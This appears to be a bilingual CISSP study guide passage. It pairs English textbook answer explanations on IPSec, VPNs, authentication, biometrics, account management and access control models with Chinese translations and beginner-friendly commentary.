A permanent virtual circuit (PVC) can be described as a logical circuit that always exists and is waiting for the customer to send data. Softwaredefined networking (SDN) is a unique approach to network operation, design, and management. SDN aims at separating the infrastructure layer (hardware and hardware-based settings) from the control layer (network services of data transmission management). A virtual private network (VPN) is a communication channel between two entities across an intermediary untrusted network. A switched virtual circuit (SVC) has to 15. D.

中文直译 / 整理

当IPSec以隧道模式使用时,整个数据包(而不仅仅是负载)都会被加 密。 传输模式仅加密原始负载,而不加密原始头部。 封装安全负载(ESP)是 IPSec的加密组件,而非VPN连接的模式。 认证头部(AH)是IPSec的主要 认证机制。 16. A. 认证头部(AH)提供消息完整性与身份验证(即认证)的保障。 封装 安全负载(ESP)提供负载内容的机密性与完整性。 ESP还提供加密、有限的 认证功能,并防止重放攻击。 IP负载压缩(IPComp)是IPSec使用的压缩工 具,用于在ESP加密之前压缩数据,以期跟上线路速度传输。 互联网密钥交换 (IKE)是IPSec管理加密密钥的机制,由三个部分组成:OAKLEY、 SKEME和ISAKMP。 17. B. 数据残留销毁是与存储技术相关的安全问题,而非电子邮件解决方案 的主要关注点。 电子邮件的基本概念,本地系统可以强制执行和保护的包括 不可否认性性、消息完整性以及访问限制。 18. D. 备份方法并非与最终用户讨论电子邮件保留时的重要因素。

电子邮件 保留策略的细节可能需要与相关主体共享,可能包括隐私影响、消息保留时 长(即保留期限),以及消息的使用目的(如审计或违规调查)。 19. D. 静态IP地址分配并非多层协议的含义; 它是IP协议的一个特性,当地 址在本地系统上定义而非由DHCP动态分配时使用。 多层协议包括VLAN跳 跃、多重封装以及使用隧道技术规避过滤的风险。 20. B. 永久虚电路(PVC)可描述为始终存在并等待客户发送数据的逻辑电路。 软件定义网络(SDN)是一种独特的网络运营、设计和管理方法。 SDN旨在将 基础设施层(硬件和基于硬件的设置)与控制层(数据传输管理的网络服务) 分离。 虚拟专用网络(VPN)是在两个实体之间通过中间不可信网络建立的通 信通道。 交换虚电路(SVC)必须

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

没有日志和身份绑定,就很难问责。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
保留期限 保留期限规定数据、日志或记录要保存多久。
学习单元 122 / PDF P1516

第 1516 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

be created each time it is needed using the best paths currently available before it can be used and then disassembled after the transmission is complete.

中文直译 / 整理

每次需要时,使用当前可用的最佳路径创建,使用完毕后即拆除。

小白解释

场景先行:你是公司的安全负责人,正在读第 1516 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1516 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 123 / PDF P1517

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 13: Managing Identity and Authentication 1. A. Upon implementing a cloud-based federation for identity sharing, individuals will typically use their existing normal account credentials to log in. This is facilitated by the federation service, which allows for the secure sharing of identities across different systems and providers. The use of an account provided by the cloud-based federation or a hybrid identity management approach is not necessary for the user's perspective, as these are backend solutions that enable the federation to function.

Single-sign on is a related concept where a user logs in once and gains access to multiple systems without being prompted to log in again for each one, but it is a feature or capability that results from federation rather than the type of account used for login. 2. A. A primary goal when controlling access to assets is to protect against losses, including any loss of confidentiality, loss of availability, or loss of integrity. Subjects authenticate on a system, but objects do not authenticate. Subjects access objects, but objects do not access subjects. Identification and authentication are important as the first step in access control, but much more is needed to protect assets. 3. C.

The subject is active and is always the entity that receives information about, or data from, the object. A subject can be a user, a program, a process, a file, a computer, a database, and so on. The object is always the entity that provides or hosts information or data. The roles of subject and object can switch while two entities communicate to accomplish a task. 4. D. NIST SP 800-63B recommends users only be required to change their password if their current password is compromised. They do not recommend that users be required to change their password regularly at any interval. 5. B. Password history can prevent users from rotating between two passwords.

It remembers previously used passwords. Password complexity and password length help ensure that users create strong passwords. Password age ensures that users change their password regularly. 6. B. A passphrase is a long string of characters that is easy to remember, such as IP@$$edTheCISSPEx@m. It is not short and typically includes at least three sets of character types. It is strong and complex, making it difficult to crack.

中文直译 / 整理

第13章:管理身份和身份验证 1. A. 在实施基于云的联合身份共享时,个人通常会使用其现有的常规账户 凭据登录。 这由联合服务促成,该服务允许在不同系统和提供商之间安全地 共享身份。 从用户的角度来看,无需使用由基于云的联合或混合身份管理方 法提供的账户,因为这些是使联合能够运行的后端解决方案。 单点登录是一 个相关概念,指用户只需登录一次,即可访问多个系统而无需为每个系统重 复登录,但这是联合带来的功能或能力,而非用于登录的账户类型。 2. A. 控制对资产访问的主要目标是防止损失,包括机密性丧失、可用性丧失 或完整性丧失。 主体在系统上进行身份验证,但对象不进行身份验证。 主体 访问对象,但对象不访问主体。 识别和身份验证是访问控制的第一步,但要 保护资产,还需要更多措施。 3. C. 主体是主动的,始终是接收有关对象的信息或数据的实体。 主体可以是 用户、程序、进程、文件、计算机、数据库等。 对象始终是提供或托管信息 或数据的实体。 当两个实体为完成任务进行通信时,主体和对象的角色可以 互换。 4. D. NIST SP 800‑63B 建议仅在用户当前密码被泄露时才要求其更改密码。

他们不建议用户在任何固定间隔内定期更改密码。 5. B. 密码历史记录可防止用户在两个密码之间循环切换。 它会记录之前 使用过的密码。 密码复杂性和密码长度有助于确保用户创建强密码。 密 码年龄确保用户定期更改密码。 6. B. 口令短语是一串易于记忆的长字符,例如 IP@$$ edTheCISSPEx@m。 它不是短字符串,通常至少包含三种字符类型。 它 强大且复杂,难以破解。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 124 / PDF P1518

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

7. A. A synchronous authenticator generates and displays one-time passwords that are synchronized with an authentication server. An asynchronous token uses a challenge-response process to generate the one-time password. Smartcards do not generate one-time passwords, and common access cards are a version of a smartcard that includes a picture of the user. 8. C. The point at which the biometric false rejection rate and the false acceptance rate are equal is the crossover error rate (CER). It does not indicate that sensitivity is too high or too low. A lower CER indicates a more accurate biometric device, and a higher CER indicates a less accurate device. 9. A.

A false rejection, sometimes called a false negative authentication or a Type I error, occurs when an authentication system doesn't recognize a valid subject (Sally in this example). A false acceptance, sometimes called a false positive authentication or a Type II error, occurs when an authentication system incorrectly recognizes an invalid subject. Crossover errors and equal errors aren't valid terms related to biometrics. However, the crossover error rate (also called equal error rate) compares the false rejection rate to the false acceptance rate and provides an accuracy measurement for a biometric system. 10. C. An authenticator app on a smartphone or tablet device is the best solution.

SMS has vulnerabilities, and NIST has deprecated its use for two-factor authentication. Biometric authentication methods, such as fingerprint scans, provide strong authentication. However, purchasing biometric readers for each employee's home would be expensive. A PIN is in the something you know factor of authentication, so it doesn't provide two-factor authentication when used with a password. 11. B. Physical biometric methods such as fingerprints and iris scans provide authentication for subjects. An account ID provides identification. An authenticator is something you have, and it creates one-time passwords, but it is not related to a person's physical characteristics.

A personal identification number (PIN) is something you know. 12. B, C, D. Ridges, bifurcations, and whorls are fingerprint minutiae. Ridges are the lines in a fingerprint. Some ridges abruptly end, and some ridges bifurcate or fork into branch ridges. Whorls are a series of circles. Palm scans measure vein patterns in a palm. 7. A.

中文直译 / 整理

同步认证器生成并显示与认证服务器同步的一次性密码。 异步令牌使用 挑战‑响应过程生成一次性密码。 智能卡不生成一次性密码,而通用访问卡是 包含用户照片的智能卡版本。 8. C. 生物特征误拒率和误接受率相等的点称为交叉错误率(CER)。 它 并不表示灵敏度过高或过低。 CER 越低,表示生物特征设备越准确; CER 越高,表示设备越不准确。 9. A. 误拒(有时称为误否定认证或 I 类错误)是指认证系统未能识别出有效 主体(例如本例中的 Sally)。 误接受(有时称为误肯定认证或 II 类错误) 是指认证系统错误地识别了无效主体。 交叉错误和相等错误并非与生物特征 相关的有效术语。 然而,交叉错误率(也称为相等错误率)将误拒率与误接 受率进行比较,为生物特征系统提供准确度衡量标准。 10. C. 智能手机或平板电脑上的身份验证器应用是最佳解决方案。 短信存在 漏洞,NIST 已弃用其在双因素身份验证中的使用。 生物识别身份验证方法 (如指纹扫描)提供强身份验证。 然而,为每位员工的家用生物识别阅读器 采购成本高昂。 PIN 属于“你知道”的身份验证因素,因此当与密码一起使 用时,它不能提供双因素身份验证。

11. B. 指纹和虹膜扫描等物理生物识别方法可为主体提供身份验证。 账户 I D 提供身份识别。 身份验证器是“你拥有”的物品,它生成一次性密码,但 与个人的生理特征无关。 个人识别码(PIN)是“你知道”的内容。 12. B、C、D。 脊线、分叉点和螺纹是指纹的细节特征。 脊线是指纹中的线条, 有些脊线突然终止,有些则分叉或分支成支线。 螺纹是一系列圆形图案。 掌 纹扫描测量手掌中的静脉模式。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 125 / PDF P1519

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

13. A. Fingerprints can be counterfeited or duplicated. It is not possible to change fingerprints. Users will always have a finger available (except for major medical events). It usually takes less than a minute for registration of a fingerprint. 14. A, D. Accurate identification and authentication are required to ensure logs accurately support accountability. Logs record events, including who took an action, but without accurate identification and authentication, the logs can't be relied on. Authorization grants access to resources after proper authentication. Auditing occurs after logs are created, but identification and authentication must occur first. 15. D.

The best choice is to define a new role for Linux administrators and assign privileges based on the role definition. Linux systems do not have an Administrators group or a sudo group. However, you can grant root account access to users by adding them to the sudoers file. There isn't a sudo password. Instead, users execute root-level commands in the context of their own account, and their own password or if configured, the root user's password. Note that Chapter 14, “Controlling and Monitoring Access,” discusses sudo (and minimizing its use) in the context of privilege escalation. 16. C. The most likely reason (of the provided options) is to prevent sabotage.

If the user's account remains enabled, the user may log on later and cause damage. Disabling the account doesn't remove the account or remove assigned privileges. Disabling an account doesn't encrypt any data, but it does retain encryption keys that supervisors can use to decrypt any data encrypted by the user. 17. C. The most appropriate action to take when an employee leaves an organization is to disable their account. This action immediately prevents any further access to the organization's systems and data while preserving the account's data and audit trail.

This is essential for any necessary follow-up investigations or in cases where access may need to be temporarily reinstated, for example, if the employee returns to the organization or if there are disputes regarding their work that need to be resolved post-departure. Deleting their account would limit the potential to audit the account's history, which could be necessary for future reference. Forcing them to change their password would allow them to retain access to their account once they have left, as they would know the new password. Taking no action for a period of time leaves unnecessary 13. A.

中文直译 / 整理

指纹可以被伪造或复制。 指纹无法更改。 用户通常总有手指可用(重 大医疗事件除外)。 指纹注册通常耗时不到一分钟。 14. A, D. 为确保日志准确支持责任追溯,需要进行准确的识别和身份验证。 日志记录事件,包括谁执行了操作,但如果没有准确的识别和身份验证,日志 就不可靠。 授权在通过适当的身份验证后授予对资源的访问权限。 审计发生在 日志创建之后,但识别和身份验证必须先于审计进行。 15. D. 最佳选择是为 Linux 管理员定义一个新角色,并根据角色定义分配权 限。 Linux 系统没有 Administrators 组或 sudo 组。 但是,您可以通过将 用户添加到 sudoers 文件来授予 root 账户访问权限。 不存在 sudo 密码。 相 反,用户在自己账户的上下文中执行 root 级命令,使用自己的密码,或者如 果已配置,则使用 root 用户的密码。 请注意 第 14 章,“控制和监控访问”, 在特权提升的背景下讨论了 sudo(以及最小化其使用)。 16. C. 最可能的原因(在提供的选项中)是防止破坏行为。 如果用户的账户保 持启用状态,用户日后可能登录并造成损害。

禁用账户不会删除账户或移除分 配的权限。 禁用账户不会加密任何数据,但会保留加密密钥,以便管理员用于 解密用户加密的任何数据。 17. C. 员工离开组织时最合适的操作是禁用其账户。 此操作可立即阻止其继续 访问组织的系统和数据,同时保留账户的数据和审计日志。 这对于任何必要的 后续调查或在需要临时恢复访问权限的情况下至关重要,例如员工重返组织, 或在离职后需要解决与其工作相关的争议时。 删除账户将限制审计账户历史记 录的可能性,而这些记录可能对未来的参考至关重要。 强制其更改密码会使他 们在离开后仍能访问账户,因为他们知道新密码。 在一段时间内不采取任何行 动会留下不必要的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
学习单元 126 / PDF P1520

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

security risks, as the departing employee would still have access to the system. 18. D. It's appropriate to disable an account when an employee takes a leave of absence of 30 days or more. The account should not be deleted because the employee is expected to return after the leave of absence. If the password is reset, someone could still log on. If nothing is done to the account, someone else may access it and impersonate the employee. 19. C. Account access reviews can detect security issues for service accounts such as the sa (short for system administrator) account in Microsoft SQL Server systems. Reviews can ensure that service account passwords are strong and changed often.

The other options suggest removing, disabling, or deleting the sa account, but doing so is likely to affect the database server's performance. Account deprovisioning ensures accounts are removed when they are no longer needed. Disabling an account ensures it isn't used, and account revocation deletes the account. 20. D. A periodic account access review can discover when users have more privileges than they need and could have been used to discover that this employee had permissions from several positions. Strong authentication methods (including multifactor authentication methods) would not have prevented the problems in this scenario.

Logging records what happened, but it doesn't prevent events.

中文直译 / 整理

安全风险,因为离职员工仍可访问系统。 18. D. 当员工请假30天或以上时,禁用其账户是合适的。 不应删除账户,因 为员工预计会在假期结束后返回。 如果重置密码,他人仍可能登录。 如果不 对账户做任何处理,其他人可能访问该账户并冒充该员工。 19. C. 账户访问审查可以检测服务账户(例如 Microsoft SQL Server 系统中 的 sa(系统管理员)账户)的安全问题。 审查可以确保服务账户密码强度足 够且经常更改。 其他选项建议移除、禁用或删除 sa 账户,但这样做可能会影 响数据库服务器的性能。 账户停用确保在账户不再需要时将其移除。 禁用账户 可确保其不被使用,而账户撤销则会删除账户。 20. D. 定期的账户访问审查可以发现用户拥有超出其需求的权限,并可能发现 该员工拥有多个职位的权限。 强身份验证方法(包括多因素身份验证方法)无 法防止本场景中的问题。 日志记录事件发生情况,但不能阻止事件发生。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 127 / PDF P1521

第 1521 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 14: Controlling and Monitoring Access 1. B. The implicit deny principle ensures that access to an object is denied unless access has been expressly allowed (or explicitly granted) to a subject. It does not allow all actions that are not denied, and it doesn't require all actions to be denied. 2. B. An access control matrix includes multiple objects and subjects. It identifies access granted to subjects (such as users) to objects (such as files). A single list of subjects for any specific object within an access control matrix is an access control list. A federation refers to a group of companies that share a federated identity management (FIM) system for single sign-on (SSO).

Creeping privileges refers to excessive privileges a subject gathers over time. 3. B. A discretionary access control model allows the owner (or data custodian) of a resource to grant permissions at the owner's discretion. The other answers (MAC, RBAC, and rule-based access control) are nondiscretionary models. 4. A. The DAC model allows the owner of data to modify permissions on the data. In the DAC model, objects have owners, and the owners can grant or deny access to objects that they own. The MAC model uses labels to assign access based on a user's need to know and organization policies. A rule-based access control model uses rules to grant or block access.

A risk-based access control model examines the environment, the situation, and policies coded in software to determine access. 5. D. A role-based access control (RBAC) model can group users into roles based on the organization's hierarchy, and it is a nondiscretionary access control model. A nondiscretionary access control model uses a central authority to determine which objects that subjects can access. In contrast, a discretionary access control (DAC) model allows users to grant or reject access to any objects they own. An ACL is an example of a rule-based access control model that uses rules, not roles. 6. A.

The role-based access control (RBAC) model is based on role or group membership, and users can be members of multiple groups. Users are not limited to only a single role. RBAC models are based on the hierarchy of an organization, so they are hierarchy-based. The mandatory access control (MAC) model uses assigned labels to identify access.

中文直译 / 整理

第14章:控制和监控访问 1. B. 隐式拒绝原则确保除非明确允许(或明确授予)某个主体对对象的访 问,否则将拒绝访问。 它并不允许所有未被拒绝的操作,也不要求所有操 作都被拒绝。 2. B. 访问控制矩阵包含多个对象和主体。 它标识了主体(如用户)对对象 (如文件)所授予的访问权限。 访问控制矩阵中某个特定对象的主体单一列 表称为访问控制列表。 联邦指的是一组共享联合身份管理(FIM)系统以实 现单点登录(SSO)的公司。 权限蔓延指的是主体随时间积累的过度权限。 3. B. 自主访问控制模型允许资源的所有者(或数据管理员)自行决定授予 权限。 其他选项(MAC、RBAC 和基于规则的访问控制)均为非自主模型。 4. A. DAC 模型允许数据的所有者修改数据的权限。 在 DAC 模型中,对象拥 有所有者,所有者可以授予或拒绝访问其拥有的对象。 MAC 模型使用标签, 根据用户的知悉需求和组织策略分配访问权限。 基于规则的访问控制模型使 用规则来授予或阻止访问。 基于风险的访问控制模型会检查环境、情况以及 软件中编码的策略以确定访问权限。

5. D. 基于角色的访问控制(RBAC)模型可以根据组织的层级结构将用户分 组为角色,它是一种非自主访问控制模型。 非自主访问控制模型使用中央权 威来确定主体可以访问哪些对象。 相比之下,自主访问控制(DAC)模型允 许用户授予或拒绝访问其拥有的任何对象。 ACL 是基于规则的访问控制模型 的一个示例,它使用规则而非角色。 6. A. 基于角色的访问控制(RBAC)模型基于角色或组成员身份,用户可以 是多个组的成员。 用户并不局限于仅一个角色。 RBAC 模型基于组织的层级 结构,因此属于基于层级的模型。 强制访问控制(MAC)模型使用分配的标 签来标识访问权限。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

自主访问控制 DAC:DAC 由对象所有者决定谁能访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1521 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

角色、岗位、职责分离常对应 RBAC。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

文件所有者授权、ACL 常见于 DAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 128 / PDF P1522

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

7. D. A rule-based access control model uses global rules applied to all users and other subjects equally. It does not apply rules locally or to individual users. 8. B. The ABAC model is commonly used in SDNs. None of the other answers are normally used in SDNs. The MAC model uses labels to define access, and the RBAC model uses groups. In the DAC model, the owner grants access to others. 9. B. In a hierarchical environment, the various classification labels are assigned in an ordered structure from low security to high security. The mandatory access control (MAC) model supports three environments: hierarchical, compartmentalized, and hybrid.

A compartmentalized environment ignores the levels and instead only allows access for individual compartments on any level. A hybrid environment is a combination of a hierarchical and compartmentalized environment. A MAC model doesn't use a centralized environment. 10. B. The MAC model uses labels to identify the upper and lower bounds of classification levels, and these define the level of access for subjects. MAC is a nondiscretionary access control model that uses labels. However, not all nondiscretionary access control models use labels. DAC and ABAC models do not use labels. 11. C. Mandatory access control (MAC) models rely on the use of labels for subjects and objects.

They look similar to a lattice when drawn, so the MAC model is often referred to as a lattice-based model. None of the other answers use labels. Discretionary access control (DAC) models allow an owner of an object to control access to the object. Nondiscretionary access controls have centralized management, such as a rule-based access control model deployed on a firewall. Role-based access control (RBAC) models define a subject's access based on jobrelated roles. 12. A. A risk-based access control model can require users to authenticate with multifactor authentication. None of the other access control models listed can evaluate how a user has logged on.

A MAC model uses labels to grant access. An RBAC model grants access based on job roles or groups. In a DAC model, the owner grants access to resources. 13. A. A risk-based access control model evaluates the environment and the situation and then makes access decisions based on coded policies. A MAC model grants access using labels. An RBAC model uses a well- 7. D.

中文直译 / 整理

